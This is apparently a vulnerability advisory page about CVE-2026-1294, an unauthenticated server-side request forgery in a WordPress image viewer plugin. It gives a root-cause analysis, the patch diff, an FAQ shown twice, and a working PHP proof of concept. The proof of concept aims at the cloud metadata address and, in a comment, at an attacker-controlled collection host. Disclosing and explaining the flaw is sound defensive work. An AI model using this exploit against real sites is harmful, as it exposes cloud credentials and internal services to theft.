What is CVE-2026-1294?

CVE-2026-1294 is a high-severity vulnerability in the All In One Image Viewer Block plugin for WordPress, affecting versions up to and including 1.0.2. It allows unauthenticated attackers to exploit a Server-Side Request Forgery (SSRF) flaw via the image-proxy REST API endpoint, enabling them to make arbitrary web requests from the server.

How does the vulnerability work?

The vulnerability exists because the image-proxy endpoint does not validate user permissions or the URL input. Attackers can send a GET request to this endpoint with a malicious URL, allowing them to access sensitive internal services or external servers, effectively turning the web server into a proxy for unauthorized requests.

Who is affected by this vulnerability?

Any WordPress site using the All In One Image Viewer Block plugin version 1.0.2 or earlier is at risk. Administrators can check their installed plugins and versions in the WordPress admin dashboard under the ‘Plugins’ section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the All In One Image Viewer Block plugin installed. If it is version 1.0.2 or earlier, your site is susceptible to CVE-2026-1294. Additionally, you can perform a test by attempting to access the image-proxy endpoint with a controlled URL.

How can I fix or mitigate this issue?

To address CVE-2026-1294, update the All In One Image Viewer Block plugin to version 1.0.3 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is crucial for maintaining site security.

What does the CVSS score of 7.2 indicate?

The CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. This means that successful exploitation could lead to serious consequences, such as data exposure or unauthorized access to internal services.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to sensitive internal services, which could lead to data breaches or further exploitation of the network. Attackers could use this vulnerability to gather sensitive information or launch attacks against other systems.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can exploit the SSRF vulnerability by sending a crafted request to the image-proxy endpoint with a malicious URL. This request can target internal services, such as AWS metadata endpoints, demonstrating the potential for unauthorized data access.

What changes were made in the patched version?

In version 1.0.3, the plugin was updated to include a permission callback requiring user authentication and added validation for the URL parameter. These changes restrict access to the endpoint and ensure that only safe URLs are processed, effectively mitigating the SSRF vulnerability.

Can this vulnerability be exploited remotely?

Yes, this vulnerability can be exploited remotely. Since the image-proxy endpoint is publicly accessible without authentication, any unauthenticated user can send requests to it, making it a significant risk for all WordPress installations using the affected plugin.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the All In One Image Viewer Block plugin until a patch can be applied. Additionally, you can implement firewall rules to restrict access to the vulnerable endpoint or monitor for suspicious activity related to this vulnerability.

How can I stay informed about vulnerabilities like CVE-2026-1294?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) or CVE databases for updates on vulnerabilities affecting WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1294: All In One Image Viewer Block <= 1.0.2 – Unauthenticated Server-Side Request Forgery via image-proxy Endpoint (image-viewer)

CVE ID CVE-2026-1294

Plugin image-viewer

Severity High (CVSS 7.2)

CWE 918

Vulnerable Version 1.0.2

Patched Version 1.0.3

Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1294:
The All In One Image Viewer Block WordPress plugin, versions up to and including 1.0.2, contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The vulnerability resides in the plugin’s REST API endpoint, which lacks proper access controls and input validation. This allows any unauthenticated attacker to force the server to make arbitrary HTTP requests to internal or external systems, potentially exposing sensitive data.

Atomic Edge research identifies the root cause in the `bpivbBlock` class constructor within the file `image-viewer/image-viewer-block.php`. The plugin registers a REST route `bpivb/v1/image-proxy` via the `register_rest_route` function. The callback for this endpoint directly uses the user-supplied `url` parameter in a `wp_remote_get()` call. The vulnerable code lacks a `permission_callback` function, making the endpoint accessible to unauthenticated users. It also lacks a `validate_callback` for the `url` parameter, failing to restrict requests to safe schemes or validate the URL structure.

Exploitation is straightforward. An attacker sends a GET request to the publicly accessible WordPress REST API endpoint `/wp-json/bpivb/v1/image-proxy`. The attacker supplies a malicious `url` parameter pointing to an internal service (e.g., `http://169.254.169.254/latest/meta-data/`) or an external attacker-controlled server. The vulnerable plugin fetches the specified URL and returns the response body and headers to the attacker, effectively turning the web server into a proxy for internal network reconnaissance or data exfiltration.

The patch, applied in version 1.0.3, addresses both the authorization and validation flaws. The `register_rest_route` call now includes a `permission_callback` that requires the user to have the `upload_files` capability. It also defines strict `args` for the `url` parameter, employing `sanitize_callback` and `validate_callback`. The validation ensures the URL is valid via `wp_http_validate_url()` and restricts the scheme to only `http` or `https`. These changes prevent unauthenticated access and block requests to internal network schemes like `file://`, `gopher://`, or `dict://`.

Successful exploitation enables attackers to probe and interact with internal services that are not normally accessible from the internet. This can lead to the disclosure of sensitive information from metadata services, databases, or administrative panels. Attackers could also use the vulnerable server to launch attacks against other internal systems, potentially leading to further network compromise. The SSRF flaw acts as a critical pivot point within the network perimeter.

Differential between vulnerable and patched code

Code Diff

--- a/image-viewer/build/admin/dashboard.asset.php
+++ b/image-viewer/build/admin/dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '61c32651f09fdba18ce1');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '57d48e8ca56333ba8ecd');
--- a/image-viewer/build/index.asset.php
+++ b/image-viewer/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '4e69ccf3be9594fb5ae2');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => 'a13960b1237e48df4554');
--- a/image-viewer/build/render.php
+++ b/image-viewer/build/render.php
@@ -1,4 +1,7 @@
 <?php
+  if (! defined('ABSPATH')) {
+    exit;
+  }
    extract($attributes);
        $id = wp_unique_id( 'bpivbImageViewer-' );

--- a/image-viewer/build/view.asset.php
+++ b/image-viewer/build/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => 'e969699ef63343b68e2d');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => '1da8164bc5736a7f000f');
--- a/image-viewer/image-viewer-block.php
+++ b/image-viewer/image-viewer-block.php
@@ -1,54 +1,124 @@
 <?php
+if (! defined('ABSPATH')) {
+    exit;
+}
 if (! class_exists('bpivbBlock')) {
-    class bpivbBlock{
-      public function __construct(){
-          add_action('enqueue_block_assets', [$this, 'enqueueBlockAssets']);
-          add_action('init', [$this, 'onInit']);
-          add_action('enqueue_block_editor_assets', [$this, 'bpivbEnqueueBlockEditorAssets']);
-          add_action('enqueue_block_assets', [$this, "bpivbFrontendScript"]);
-          add_action('rest_api_init', function() {
-              register_rest_route('bpivb/v1', '/image-proxy',
-              [
-                  'methods' => 'GET',
-                  'callback' => function($data) {
-                      $url = $data->get_param('url');
-
-                      if (!$url) return new WP_Error('no_url', 'No URL provided', ['status' => 400]);
-
-                      $response = wp_remote_get($url);
-                      if (is_wp_error($response)) return new WP_Error('fetch_failed', 'Failed to fetch image', ['status' => 500]);
-
-                      $body = wp_remote_retrieve_body($response);
-                      $type = wp_remote_retrieve_header($response, 'content-type');
-
-                      header('Content-Type: ' . $type);
-                      echo $body;
-                      exit;
-                  }
-              ]);
-          });
-
-      }
-
-      public function enqueueBlockAssets(){
-          wp_register_style('magnify', BPIVB_ASSETS_DIR . 'css/magnify.css', [], BPIVB_PLUGIN_VERSION);
-          wp_register_script('panzoom', BPIVB_ASSETS_DIR . 'js/panzoom.min.js', ['jquery'], BPIVB_PLUGIN_VERSION);
-          wp_register_script('magnify', BPIVB_ASSETS_DIR . 'js/magnify.js', ['jquery'], BPIVB_PLUGIN_VERSION);
-          wp_register_script('three', BPIVB_ASSETS_DIR . 'js/three.min.js', [], BPIVB_PLUGIN_VERSION);
-          wp_register_script('panoramajs', BPIVB_ASSETS_DIR . 'js/panorama.min.js', ["three","jquery"], BPIVB_PLUGIN_VERSION);
-      }
-
-      public function onInit(){
-        register_block_type( __DIR__ . '/build' );
-      }
-
-      //edit.js aer moddhe bpivbIsPremium  ta niye jasci / bpivb-image-viewer-directory  ta block.json aer name ta akne Frontend Script a bcbIsPremium  jabe
-      public function bpivbEnqueueBlockEditorAssets(){
-        wp_add_inline_script('bpivb-image-viewer-directory-editor-script', 'const bpivbPipecheck =  ' . wp_json_encode(bpivbIsPremium()) . ';', 'before');
-      }
-      public function bpivbFrontendScript(){
-         wp_add_inline_script('bpivb-image-viewer-directory-view-script', 'const bpivbPipecheck =  ' . wp_json_encode(bpivbIsPremium()) . ';', 'before');
-      }
+    class bpivbBlock
+    {
+        public function __construct()
+        {
+            add_action('enqueue_block_assets', [$this, 'enqueueBlockAssets']);
+            add_action('init', [$this, 'onInit']);
+            add_action('enqueue_block_editor_assets', [$this, 'bpivbEnqueueBlockEditorAssets']);
+            add_action('enqueue_block_assets', [$this, "bpivbFrontendScript"]);
+            add_action('rest_api_init', function () {
+                register_rest_route('bpivb/v1', '/image-proxy', [
+                    'methods'  => 'GET',
+
+                    //Permission check (prevents public abuse)
+                    'permission_callback' => function () {
+                        return current_user_can('upload_files');
+                    },
+
+                    //Strict URL validation before callback runs
+                    'args' => [
+                        'url' => [
+                            'required' => true,
+                            'sanitize_callback' => 'esc_url_raw',
+                            'validate_callback' => function ($param) {
+
+                                // Must be a valid URL
+                                if (!wp_http_validate_url($param)) {
+                                    return false;
+                                }
+
+                                // Allow only http / https
+                                $scheme = wp_parse_url($param, PHP_URL_SCHEME);
+                                if (!in_array($scheme, ['http', 'https'], true)) {
+                                    return false;
+                                }
+
+                                return true;
+                            },
+                        ],
+                    ],
+
+                    'callback' => function ($data) {
+                        $url = $data->get_param('url');
+
+                        if (!$url) {
+                            return new WP_Error('no_url', 'No URL provided', ['status' => 400]);
+                        }
+
+                        $response = wp_remote_get($url);
+
+                        if (is_wp_error($response)) {
+                            return new WP_Error('fetch_failed', 'Failed to fetch image', ['status' => 500]);
+                        }
+
+                        $body = wp_remote_retrieve_body($response);
+                        $type = wp_remote_retrieve_header($response, 'content-type');
+
+                        header('Content-Type: ' . $type);
+                        echo $body;
+                        exit;
+                    },
+                ]);
+            });
+
+        }
+
+        public function enqueueBlockAssets()
+        {
+            wp_register_style('magnify', BPIVB_ASSETS_DIR . 'css/magnify.css', [], BPIVB_PLUGIN_VERSION);
+            wp_register_script('panzoom', BPIVB_ASSETS_DIR . 'js/panzoom.min.js', ['jquery'], BPIVB_PLUGIN_VERSION);
+            wp_register_script('magnify', BPIVB_ASSETS_DIR . 'js/magnify.js', ['jquery'], BPIVB_PLUGIN_VERSION);
+            wp_register_script('three', BPIVB_ASSETS_DIR . 'js/three.min.js', [], BPIVB_PLUGIN_VERSION);
+            wp_register_script('panoramajs', BPIVB_ASSETS_DIR . 'js/panorama.min.js',
+            ["three", "jquery"], BPIVB_PLUGIN_VERSION);
+        }
+
+        public function onInit()
+        {
+            register_block_type(__DIR__ . '/build');
+        }
+
+        //edit.js aer moddhe bpivbIsPremium  ta niye jasci
+        // / bpivb-image-viewer-directory  ta block.json aer name ta akne Frontend Script a bcbIsPremium  jabe
+
+        public function bpivbEnqueueBlockEditorAssets()
+        {
+            wp_add_inline_script('bpivb-image-viewer-directory-editor-script',
+            'const bpivbPipecheck =  ' . wp_json_encode(bpivbIsPremium()) . ';', 'before');
+
+            wp_localize_script(
+                'bpivb-image-viewer-directory-editor-script',
+                'BPIVB_REST',
+                [
+                    'root'  => esc_url_raw(rest_url()),
+                    'nonce' => wp_create_nonce('wp_rest'),
+                ]
+            );
+
+        }
+
+        public function bpivbFrontendScript()
+        {
+            $data = [
+                'isPremium' => function_exists('ctrbIsPremium') ? ctrbIsPremium() : false,
+                'hasPro' => defined('CTRB_HAS_PRO') ? CTRB_HAS_PRO : false,
+                'version' => defined('CTRB_VERSION') ? CTRB_VERSION : '',
+            ];
+            wp_add_inline_script('bpivb-image-viewer-directory-view-script',
+            'const bpivbPipecheck =  ' . wp_json_encode(bpivbIsPremium()) . ';', 'before');
+             wp_localize_script('bpivb-image-viewer-directory-view-script', 'BPIVB_REST',
+                [
+                    'root'  => esc_url_raw(rest_url()),
+                    'nonce' => wp_create_nonce('wp_rest'),
+                ]
+            );
+        }
     }
+
     new bpivbBlock();
-}
 No newline at end of file
+}
--- a/image-viewer/image-viewer.php
+++ b/image-viewer/image-viewer.php
@@ -3,7 +3,7 @@
 /**
  * Plugin Name: All In One Image Viewer
  * Description: A powerful Gutenberg block plugin that lets you display images with advanced interactive features like zoom, magnify, map view, hotspots, and Comparison Slider.
- * Version: 1.0.2
+ * Version: 1.0.3
  * Author: bPlugins
  * Author URI: http://bplugins.com
  * License: GPLv3
@@ -18,7 +18,7 @@
     iv_fs()->set_basename( false, __FILE__ );
 } else {
     // Constant
-    define( 'BPIVB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '1.0.2' ) );
+    define( 'BPIVB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '1.0.3' ) );
     define( 'BPIVB_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
     define( 'BPIVB_DIR', plugin_dir_url( __FILE__ ) );
     define( 'BPIVB_ASSETS_DIR', plugin_dir_url( __FILE__ ) . 'assets/' );
--- a/image-viewer/includes/class-bpivbAdminMenu.php
+++ b/image-viewer/includes/class-bpivbAdminMenu.php
@@ -16,8 +16,8 @@
     public function bpivb_AdminMenu_Create() {
           add_submenu_page(
             'edit.php?post_type=bpivb',
-            __('Help - bPlugins', 'b-pricing-table'),
-            __('Help And Demo', 'b-pricing-table'),
+            __('Help - bPlugins', 'image-viewer'),
+            __('Help And Demo', 'image-viewer'),
             'manage_options',
             'Image_viewer_block',
             [$this, 'renderDashboardPage']
--- a/image-viewer/includes/class-bpivbPlugin.php
+++ b/image-viewer/includes/class-bpivbPlugin.php
@@ -1,4 +1,7 @@
 <?php
+if (! defined('ABSPATH')) {
+  exit;
+}

 if (! class_exists('bpivbPlugin')) {
     class bpivbPlugin
--- a/image-viewer/includes/function.php
+++ b/image-viewer/includes/function.php
@@ -1,4 +1,7 @@
 <?php
+if (! defined('ABSPATH')) {
+  exit;
+}
 function bpivbIsPremium() {
     return BPIVB_HAS_PRO ? iv_fs()->can_use_premium_code() : false;
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1294 - All In One Image Viewer Block <= 1.0.2 - Unauthenticated Server-Side Request Forgery via image-proxy Endpoint

<?php

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS

// The vulnerable REST API endpoint
$endpoint = '/wp-json/bpivb/v1/image-proxy';

// Target an internal service (e.g., AWS metadata endpoint for demonstration)
$ssrf_target = 'http://169.254.169.254/latest/meta-data/';
// Alternatively, target an external server to confirm outbound connectivity:
// $ssrf_target = 'http://attacker-controlled-server.com/collect';

$full_url = $target_url . $endpoint . '?url=' . urlencode($ssrf_target);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The endpoint does not require authentication
curl_setopt($ch, CURLOPT_HTTPHEADER, array('User-Agent: Atomic-Edge-SSRF-Test/1.0'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response Body:n";
    echo htmlspecialchars($response);
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1294?
Understanding the vulnerability
CVE-2026-1294 is a high-severity vulnerability in the All In One Image Viewer Block plugin for WordPress, affecting versions up to and including 1.0.2. It allows unauthenticated attackers to exploit a Server-Side Request Forgery (SSRF) flaw via the image-proxy REST API endpoint, enabling them to make arbitrary web requests from the server.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists because the image-proxy endpoint does not validate user permissions or the URL input. Attackers can send a GET request to this endpoint with a malicious URL, allowing them to access sensitive internal services or external servers, effectively turning the web server into a proxy for unauthorized requests.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the All In One Image Viewer Block plugin version 1.0.2 or earlier is at risk. Administrators can check their installed plugins and versions in the WordPress admin dashboard under the ‘Plugins’ section.
How can I check if my site is vulnerable?
Verification steps
To determine if your site is vulnerable, check the version of the All In One Image Viewer Block plugin installed. If it is version 1.0.2 or earlier, your site is susceptible to CVE-2026-1294. Additionally, you can perform a test by attempting to access the image-proxy endpoint with a controlled URL.
How can I fix or mitigate this issue?
Recommended actions
To address CVE-2026-1294, update the All In One Image Viewer Block plugin to version 1.0.3 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is crucial for maintaining site security.
What does the CVSS score of 7.2 indicate?
Understanding severity levels
The CVSS score of 7.2 indicates a high severity level, suggesting that the vulnerability poses a significant risk to affected systems. This means that successful exploitation could lead to serious consequences, such as data exposure or unauthorized access to internal services.
What are the practical risks of this vulnerability?
Potential consequences
The practical risks include unauthorized access to sensitive internal services, which could lead to data breaches or further exploitation of the network. Attackers could use this vulnerability to gather sensitive information or launch attacks against other systems.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an attacker can exploit the SSRF vulnerability by sending a crafted request to the image-proxy endpoint with a malicious URL. This request can target internal services, such as AWS metadata endpoints, demonstrating the potential for unauthorized data access.
What changes were made in the patched version?
Improvements in version 1.0.3
In version 1.0.3, the plugin was updated to include a permission callback requiring user authentication and added validation for the URL parameter. These changes restrict access to the endpoint and ensure that only safe URLs are processed, effectively mitigating the SSRF vulnerability.
Can this vulnerability be exploited remotely?
Access requirements
Yes, this vulnerability can be exploited remotely. Since the image-proxy endpoint is publicly accessible without authentication, any unauthenticated user can send requests to it, making it a significant risk for all WordPress installations using the affected plugin.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the All In One Image Viewer Block plugin until a patch can be applied. Additionally, you can implement firewall rules to restrict access to the vulnerable endpoint or monitor for suspicious activity related to this vulnerability.
How can I stay informed about vulnerabilities like CVE-2026-1294?
Keeping up to date
To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) or CVE databases for updates on vulnerabilities affecting WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations